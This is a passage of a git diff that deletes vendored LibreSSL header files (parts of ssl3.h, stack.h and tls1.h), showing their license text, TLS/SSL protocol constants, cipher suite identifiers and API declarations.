-#define SSL3_ST_SW_FINISHED_A			(0x1E0|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_FINISHED_B			(0x1E1|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SESSION_TICKET_A		(0x1F0|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SESSION_TICKET_B		(0x1F1|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_STATUS_A		(0x200|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_STATUS_B		(0x201|SSL_ST_ACCEPT)
-
-#define SSL3_MT_HELLO_REQUEST			0
-#define SSL3_MT_CLIENT_HELLO			1
-#define SSL3_MT_SERVER_HELLO			2
-#define	SSL3_MT_NEWSESSION_TICKET		4
-#define SSL3_MT_CERTIFICATE			11
-#define SSL3_MT_SERVER_KEY_EXCHANGE		12
-#define SSL3_MT_CERTIFICATE_REQUEST		13
-#define SSL3_MT_SERVER_DONE			14
-#define SSL3_MT_CERTIFICATE_VERIFY		15
-#define SSL3_MT_CLIENT_KEY_EXCHANGE		16
-#define SSL3_MT_FINISHED			20
-#define SSL3_MT_CERTIFICATE_STATUS		22
-
-#define DTLS1_MT_HELLO_VERIFY_REQUEST		3
-
-#define SSL3_MT_CCS				1
-
-/* These are used when changing over to a new cipher */
-#define SSL3_CC_READ		0x01
-#define SSL3_CC_WRITE		0x02
-#define SSL3_CC_CLIENT		0x10
-#define SSL3_CC_SERVER		0x20
-#define SSL3_CHANGE_CIPHER_CLIENT_WRITE		(SSL3_CC_CLIENT|SSL3_CC_WRITE)
-#define SSL3_CHANGE_CIPHER_SERVER_READ		(SSL3_CC_SERVER|SSL3_CC_READ)
-#define SSL3_CHANGE_CIPHER_CLIENT_READ		(SSL3_CC_CLIENT|SSL3_CC_READ)
-#define SSL3_CHANGE_CIPHER_SERVER_WRITE		(SSL3_CC_SERVER|SSL3_CC_WRITE)
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/stack.h b/thirdparty/libressl/include/openssl/stack.h
deleted file mode 100644
index 6bea634..0000000
--- a/thirdparty/libressl/include/openssl/stack.h
+++ /dev/null
@@ -1,107 +0,0 @@
-/* $OpenBSD: stack.h,v 1.9 2014/06/12 15:49:30 deraadt Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_STACK_H
-#define HEADER_STACK_H
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct stack_st {
-	int num;
-	char **data;
-	int sorted;
-
-	int num_alloc;
-	int (*comp)(const void *, const void *);
-} _STACK;  /* Use STACK_OF(...) instead */
-
-#define M_sk_num(sk)		((sk) ? (sk)->num:-1)
-#define M_sk_value(sk,n)	((sk) ? (sk)->data[n] : NULL)
-
-int sk_num(const _STACK *);
-void *sk_value(const _STACK *, int);
-
-void *sk_set(_STACK *, int, void *);
-
-_STACK *sk_new(int (*cmp)(const void *, const void *));
-_STACK *sk_new_null(void);
-void sk_free(_STACK *);
-void sk_pop_free(_STACK *st, void (*func)(void *));
-int sk_insert(_STACK *sk, void *data, int where);
-void *sk_delete(_STACK *st, int loc);
-void *sk_delete_ptr(_STACK *st, void *p);
-int sk_find(_STACK *st, void *data);
-int sk_find_ex(_STACK *st, void *data);
-int sk_push(_STACK *st, void *data);
-int sk_unshift(_STACK *st, void *data);
-void *sk_shift(_STACK *st);
-void *sk_pop(_STACK *st);
-void sk_zero(_STACK *st);
-int (*sk_set_cmp_func(_STACK *sk, int (*c)(const void *, const void *)))(
-    const void *, const void *);
-_STACK *sk_dup(_STACK *st);
-void sk_sort(_STACK *st);
-int sk_is_sorted(const _STACK *st);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/tls1.h b/thirdparty/libressl/include/openssl/tls1.h
deleted file mode 100644
index 8e369c7..0000000
--- a/thirdparty/libressl/include/openssl/tls1.h
+++ /dev/null
@@ -1,746 +0,0 @@
-/* $OpenBSD: tls1.h,v 1.31 2017/08/28 17:36:58 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- *
- * Portions of the attached software ("Contribution") are developed by
- * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
- *
- * The Contribution is licensed pursuant to the OpenSSL open source
- * license provided above.
- *
- * ECC cipher suite support in OpenSSL originally written by
- * Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
- *
- */
-/* ====================================================================
- * Copyright 2005 Nokia. All rights reserved.
- *
- * The portions of the attached software ("Contribution") is developed by
- * Nokia Corporation and is licensed pursuant to the OpenSSL open source
- * license.
- *
- * The Contribution, originally written by Mika Kousa and Pasi Eronen of
- * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
- * support (see RFC 4279) to OpenSSL.
- *
- * No patent licenses or other rights except those expressly stated in
- * the OpenSSL open source license shall be deemed granted or received
- * expressly, by implication, estoppel, or otherwise.
- *
- * No assurances are provided by Nokia that the Contribution does not
- * infringe the patent or other intellectual property rights of any third
- * party or that the license provides you with all the necessary rights
- * to make use of the Contribution.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
- * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
- * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
- * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
- * OTHERWISE.
- */
-
-#ifndef HEADER_TLS1_H
-#define HEADER_TLS1_H
-
-#include <openssl/buffer.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define TLS1_ALLOW_EXPERIMENTAL_CIPHERSUITES	0
-
-#define TLS1_2_VERSION			0x0303
-#define TLS1_2_VERSION_MAJOR		0x03
-#define TLS1_2_VERSION_MINOR		0x03
-
-#define TLS1_1_VERSION			0x0302
-#define TLS1_1_VERSION_MAJOR		0x03
-#define TLS1_1_VERSION_MINOR		0x02
-
-#define TLS1_VERSION			0x0301
-#define TLS1_VERSION_MAJOR		0x03
-#define TLS1_VERSION_MINOR		0x01
-
-#define TLS1_get_version(s) \
-		((s->version >> 8) == TLS1_VERSION_MAJOR ? s->version : 0)
-
-#define TLS1_get_client_version(s) \
-		((s->client_version >> 8) == TLS1_VERSION_MAJOR ? s->client_version : 0)
-
-/*
- * TLS Alert codes.
- *
- * https://www.iana.org/assignments/tls-parameters/#tls-parameters-6
- */
-
-#define TLS1_AD_DECRYPTION_FAILED		21
-#define TLS1_AD_RECORD_OVERFLOW			22
-#define TLS1_AD_UNKNOWN_CA			48	/* fatal */
-#define TLS1_AD_ACCESS_DENIED			49	/* fatal */
-#define TLS1_AD_DECODE_ERROR			50	/* fatal */
-#define TLS1_AD_DECRYPT_ERROR			51
-#define TLS1_AD_EXPORT_RESTRICTION		60	/* fatal */
-#define TLS1_AD_PROTOCOL_VERSION		70	/* fatal */
-#define TLS1_AD_INSUFFICIENT_SECURITY		71	/* fatal */
-#define TLS1_AD_INTERNAL_ERROR			80	/* fatal */
-/* Code 86 from RFC 7507. */
-#define TLS1_AD_INAPPROPRIATE_FALLBACK		86	/* fatal */
-#define TLS1_AD_USER_CANCELLED			90
-#define TLS1_AD_NO_RENEGOTIATION		100
-/* Codes 110-114 from RFC 3546. */
-#define TLS1_AD_UNSUPPORTED_EXTENSION		110
-#define TLS1_AD_CERTIFICATE_UNOBTAINABLE	111
-#define TLS1_AD_UNRECOGNIZED_NAME	 	112
-#define TLS1_AD_BAD_CERTIFICATE_STATUS_RESPONSE	113
-#define TLS1_AD_BAD_CERTIFICATE_HASH_VALUE	114
-/* Code 115 from RFC 4279. */
-#define TLS1_AD_UNKNOWN_PSK_IDENTITY		115	/* fatal */
-
-/*
- * TLS ExtensionType values.
- *
- * https://www.iana.org/assignments/tls-extensiontype-values/
- */
-
-/* ExtensionType values from RFC 3546, RFC 4366 and RFC 6066. */
-#define TLSEXT_TYPE_server_name			0
-#define TLSEXT_TYPE_max_fragment_length		1
-#define TLSEXT_TYPE_client_certificate_url	2
-#define TLSEXT_TYPE_trusted_ca_keys		3
-#define TLSEXT_TYPE_truncated_hmac		4
-#define TLSEXT_TYPE_status_request		5
-
-/* ExtensionType values from RFC 4681. */
-#define TLSEXT_TYPE_user_mapping		6
-
-/* ExtensionType values from RFC 5878. */
-#define TLSEXT_TYPE_client_authz		7
-#define TLSEXT_TYPE_server_authz		8
-
-/* ExtensionType values from RFC 6091. */
-#define TLSEXT_TYPE_cert_type		9
-
-/* ExtensionType values from RFC 4492. */
-#define TLSEXT_TYPE_elliptic_curves		10
-#define TLSEXT_TYPE_ec_point_formats		11
-
-/* ExtensionType value from RFC 5054. */
-#define TLSEXT_TYPE_srp				12
-
-/* ExtensionType values from RFC 5246. */
-#define TLSEXT_TYPE_signature_algorithms	13
-
-/* ExtensionType value from RFC 5764. */
-#define TLSEXT_TYPE_use_srtp	14
-
-/* ExtensionType value from RFC 5620. */
-#define TLSEXT_TYPE_heartbeat	15
-
-/* ExtensionType value from RFC 7301. */
-#define TLSEXT_TYPE_application_layer_protocol_negotiation 16
-
-/* ExtensionType value from RFC 7685. */
-#define TLSEXT_TYPE_padding	21
-
-/* ExtensionType value from RFC 4507. */
-#define TLSEXT_TYPE_session_ticket		35
-
-/* Temporary extension type */
-#define TLSEXT_TYPE_renegotiate                 0xff01
-
-/* NameType value from RFC 3546. */
-#define TLSEXT_NAMETYPE_host_name 0
-/* status request value from RFC 3546 */
-#define TLSEXT_STATUSTYPE_ocsp 1
-
-/* ECPointFormat values from RFC 4492. */
-#define TLSEXT_ECPOINTFORMAT_first			0
-#define TLSEXT_ECPOINTFORMAT_uncompressed		0
-#define TLSEXT_ECPOINTFORMAT_ansiX962_compressed_prime	1
-#define TLSEXT_ECPOINTFORMAT_ansiX962_compressed_char2	2
-#define TLSEXT_ECPOINTFORMAT_last			2
-
-/* Signature and hash algorithms from RFC 5246. */
-
-#define TLSEXT_signature_anonymous			0
-#define TLSEXT_signature_rsa				1
-#define TLSEXT_signature_dsa				2
-#define TLSEXT_signature_ecdsa				3
-/* FIXME IANA */
-#define TLSEXT_signature_gostr01			237
-#define TLSEXT_signature_gostr12_256			238
-#define TLSEXT_signature_gostr12_512			239
-
-#define TLSEXT_hash_none				0
-#define TLSEXT_hash_md5					1
-#define TLSEXT_hash_sha1				2
-#define TLSEXT_hash_sha224				3
-#define TLSEXT_hash_sha256				4
-#define TLSEXT_hash_sha384				5
-#define TLSEXT_hash_sha512				6
-/* FIXME IANA */
-#define TLSEXT_hash_gost94				237
-#define TLSEXT_hash_streebog_256			238
-#define TLSEXT_hash_streebog_512			239
-
-#define TLSEXT_MAXLEN_host_name 255
-
-const char *SSL_get_servername(const SSL *s, const int type);
-int SSL_get_servername_type(const SSL *s);
-/* SSL_export_keying_material exports a value derived from the master secret,
- * as specified in RFC 5705. It writes |olen| bytes to |out| given a label and
- * optional context. (Since a zero length context is allowed, the |use_context|
- * flag controls whether a context is included.)
- *
- * It returns 1 on success and zero otherwise.
- */
-int SSL_export_keying_material(SSL *s, unsigned char *out, size_t olen,
-    const char *label, size_t llen, const unsigned char *p, size_t plen,
-    int use_context);
-
-#define SSL_set_tlsext_host_name(s,name) \
-SSL_ctrl(s,SSL_CTRL_SET_TLSEXT_HOSTNAME,TLSEXT_NAMETYPE_host_name,(char *)name)
-
-#define SSL_set_tlsext_debug_callback(ssl, cb) \
-SSL_callback_ctrl(ssl,SSL_CTRL_SET_TLSEXT_DEBUG_CB,(void (*)(void))cb)
-
-#define SSL_set_tlsext_debug_arg(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_DEBUG_ARG,0, (void *)arg)
-
-#define SSL_set_tlsext_status_type(ssl, type) \
-SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_TYPE,type, NULL)
-
-#define SSL_get_tlsext_status_exts(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_GET_TLSEXT_STATUS_REQ_EXTS,0, (void *)arg)
-
-#define SSL_set_tlsext_status_exts(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_EXTS,0, (void *)arg)
-
-#define SSL_get_tlsext_status_ids(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_GET_TLSEXT_STATUS_REQ_IDS,0, (void *)arg)
-
-#define SSL_set_tlsext_status_ids(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_IDS,0, (void *)arg)
-
-#define SSL_get_tlsext_status_ocsp_resp(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_GET_TLSEXT_STATUS_REQ_OCSP_RESP,0, (void *)arg)
-
-#define SSL_set_tlsext_status_ocsp_resp(ssl, arg, arglen) \
-SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_OCSP_RESP,arglen, (void *)arg)
-
-#define SSL_CTX_set_tlsext_servername_callback(ctx, cb) \
-SSL_CTX_callback_ctrl(ctx,SSL_CTRL_SET_TLSEXT_SERVERNAME_CB,(void (*)(void))cb)
-
-#define SSL_TLSEXT_ERR_OK 0
-#define SSL_TLSEXT_ERR_ALERT_WARNING 1
-#define SSL_TLSEXT_ERR_ALERT_FATAL 2
-#define SSL_TLSEXT_ERR_NOACK 3
-
-#define SSL_CTX_set_tlsext_servername_arg(ctx, arg) \
-SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TLSEXT_SERVERNAME_ARG,0, (void *)arg)
-
-#define SSL_CTX_get_tlsext_ticket_keys(ctx, keys, keylen) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_GET_TLSEXT_TICKET_KEYS,(keylen),(keys))
-#define SSL_CTX_set_tlsext_ticket_keys(ctx, keys, keylen) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_SET_TLSEXT_TICKET_KEYS,(keylen),(keys))
-
-#define SSL_CTX_set_tlsext_status_cb(ssl, cb) \
-SSL_CTX_callback_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB,(void (*)(void))cb)
-
-#define SSL_CTX_set_tlsext_status_arg(ssl, arg) \
-SSL_CTX_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB_ARG,0, (void *)arg)
-
-#define SSL_CTX_set_tlsext_ticket_key_cb(ssl, cb) \
-SSL_CTX_callback_ctrl(ssl,SSL_CTRL_SET_TLSEXT_TICKET_KEY_CB,(void (*)(void))cb)
-
-/* PSK ciphersuites from RFC 4279. */
-#define TLS1_CK_PSK_WITH_RC4_128_SHA                    0x0300008A
-#define TLS1_CK_PSK_WITH_3DES_EDE_CBC_SHA               0x0300008B
-#define TLS1_CK_PSK_WITH_AES_128_CBC_SHA                0x0300008C
-#define TLS1_CK_PSK_WITH_AES_256_CBC_SHA                0x0300008D
-
-/* Additional TLS ciphersuites from expired Internet Draft
- * draft-ietf-tls-56-bit-ciphersuites-01.txt
- * (available if TLS1_ALLOW_EXPERIMENTAL_CIPHERSUITES is defined, see
- * s3_lib.c).  We actually treat them like SSL 3.0 ciphers, which we probably
- * shouldn't.  Note that the first two are actually not in the IDs. */
-#define TLS1_CK_RSA_EXPORT1024_WITH_RC4_56_MD5		0x03000060 /* not in ID */
-#define TLS1_CK_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5	0x03000061 /* not in ID */
-#define TLS1_CK_RSA_EXPORT1024_WITH_DES_CBC_SHA		0x03000062
-#define TLS1_CK_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA	0x03000063
-#define TLS1_CK_RSA_EXPORT1024_WITH_RC4_56_SHA		0x03000064
-#define TLS1_CK_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA	0x03000065
-#define TLS1_CK_DHE_DSS_WITH_RC4_128_SHA		0x03000066
-
-/* AES ciphersuites from RFC 3268. */
-
-#define TLS1_CK_RSA_WITH_AES_128_SHA			0x0300002F
-#define TLS1_CK_DH_DSS_WITH_AES_128_SHA			0x03000030
-#define TLS1_CK_DH_RSA_WITH_AES_128_SHA			0x03000031
-#define TLS1_CK_DHE_DSS_WITH_AES_128_SHA		0x03000032
-#define TLS1_CK_DHE_RSA_WITH_AES_128_SHA		0x03000033
-#define TLS1_CK_ADH_WITH_AES_128_SHA			0x03000034
-
-#define TLS1_CK_RSA_WITH_AES_256_SHA			0x03000035
-#define TLS1_CK_DH_DSS_WITH_AES_256_SHA			0x03000036
-#define TLS1_CK_DH_RSA_WITH_AES_256_SHA			0x03000037
-#define TLS1_CK_DHE_DSS_WITH_AES_256_SHA		0x03000038
-#define TLS1_CK_DHE_RSA_WITH_AES_256_SHA		0x03000039
-#define TLS1_CK_ADH_WITH_AES_256_SHA			0x0300003A
-
-/* TLS v1.2 ciphersuites */
-#define TLS1_CK_RSA_WITH_NULL_SHA256			0x0300003B
-#define TLS1_CK_RSA_WITH_AES_128_SHA256			0x0300003C
-#define TLS1_CK_RSA_WITH_AES_256_SHA256			0x0300003D
-#define TLS1_CK_DH_DSS_WITH_AES_128_SHA256		0x0300003E
-#define TLS1_CK_DH_RSA_WITH_AES_128_SHA256		0x0300003F
-#define TLS1_CK_DHE_DSS_WITH_AES_128_SHA256		0x03000040
-
-/* Camellia ciphersuites from RFC 4132. */
-#define TLS1_CK_RSA_WITH_CAMELLIA_128_CBC_SHA		0x03000041
-#define TLS1_CK_DH_DSS_WITH_CAMELLIA_128_CBC_SHA	0x03000042
-#define TLS1_CK_DH_RSA_WITH_CAMELLIA_128_CBC_SHA	0x03000043
-#define TLS1_CK_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA	0x03000044
-#define TLS1_CK_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA	0x03000045
-#define TLS1_CK_ADH_WITH_CAMELLIA_128_CBC_SHA		0x03000046
-
-/* TLS v1.2 ciphersuites */
-#define TLS1_CK_DHE_RSA_WITH_AES_128_SHA256		0x03000067
-#define TLS1_CK_DH_DSS_WITH_AES_256_SHA256		0x03000068
-#define TLS1_CK_DH_RSA_WITH_AES_256_SHA256		0x03000069
-#define TLS1_CK_DHE_DSS_WITH_AES_256_SHA256		0x0300006A
-#define TLS1_CK_DHE_RSA_WITH_AES_256_SHA256		0x0300006B
-#define TLS1_CK_ADH_WITH_AES_128_SHA256			0x0300006C
-#define TLS1_CK_ADH_WITH_AES_256_SHA256			0x0300006D
-
-/* Camellia ciphersuites from RFC 4132. */
-#define TLS1_CK_RSA_WITH_CAMELLIA_256_CBC_SHA		0x03000084
-#define TLS1_CK_DH_DSS_WITH_CAMELLIA_256_CBC_SHA	0x03000085
-#define TLS1_CK_DH_RSA_WITH_CAMELLIA_256_CBC_SHA	0x03000086
-#define TLS1_CK_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA	0x03000087
-#define TLS1_CK_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA	0x03000088
-#define TLS1_CK_ADH_WITH_CAMELLIA_256_CBC_SHA		0x03000089
-
-/* SEED ciphersuites from RFC 4162. */
-#define TLS1_CK_RSA_WITH_SEED_SHA                       0x03000096
-#define TLS1_CK_DH_DSS_WITH_SEED_SHA                    0x03000097
-#define TLS1_CK_DH_RSA_WITH_SEED_SHA                    0x03000098
-#define TLS1_CK_DHE_DSS_WITH_SEED_SHA                   0x03000099
-#define TLS1_CK_DHE_RSA_WITH_SEED_SHA                   0x0300009A
-#define TLS1_CK_ADH_WITH_SEED_SHA                	0x0300009B
-
-/* TLS v1.2 GCM ciphersuites from RFC 5288. */
-#define TLS1_CK_RSA_WITH_AES_128_GCM_SHA256		0x0300009C
-#define TLS1_CK_RSA_WITH_AES_256_GCM_SHA384		0x0300009D
-#define TLS1_CK_DHE_RSA_WITH_AES_128_GCM_SHA256		0x0300009E
-#define TLS1_CK_DHE_RSA_WITH_AES_256_GCM_SHA384		0x0300009F
-#define TLS1_CK_DH_RSA_WITH_AES_128_GCM_SHA256		0x030000A0
-#define TLS1_CK_DH_RSA_WITH_AES_256_GCM_SHA384		0x030000A1
-#define TLS1_CK_DHE_DSS_WITH_AES_128_GCM_SHA256		0x030000A2
-#define TLS1_CK_DHE_DSS_WITH_AES_256_GCM_SHA384		0x030000A3
-#define TLS1_CK_DH_DSS_WITH_AES_128_GCM_SHA256		0x030000A4
-#define TLS1_CK_DH_DSS_WITH_AES_256_GCM_SHA384		0x030000A5
-#define TLS1_CK_ADH_WITH_AES_128_GCM_SHA256		0x030000A6
-#define TLS1_CK_ADH_WITH_AES_256_GCM_SHA384		0x030000A7
-
-/* TLS 1.2 Camellia SHA-256 ciphersuites from RFC5932 */
-#define TLS1_CK_RSA_WITH_CAMELLIA_128_CBC_SHA256	0x030000BA
-#define TLS1_CK_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256	0x030000BB
-#define TLS1_CK_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256	0x030000BC
-#define TLS1_CK_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256	0x030000BD
-#define TLS1_CK_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256	0x030000BE
-#define TLS1_CK_ADH_WITH_CAMELLIA_128_CBC_SHA256	0x030000BF
-
-#define TLS1_CK_RSA_WITH_CAMELLIA_256_CBC_SHA256	0x030000C0
-#define TLS1_CK_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256	0x030000C1
-#define TLS1_CK_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256	0x030000C2
-#define TLS1_CK_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256	0x030000C3
-#define TLS1_CK_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256	0x030000C4
-#define TLS1_CK_ADH_WITH_CAMELLIA_256_CBC_SHA256	0x030000C5
-
-/* ECC ciphersuites from RFC 4492. */
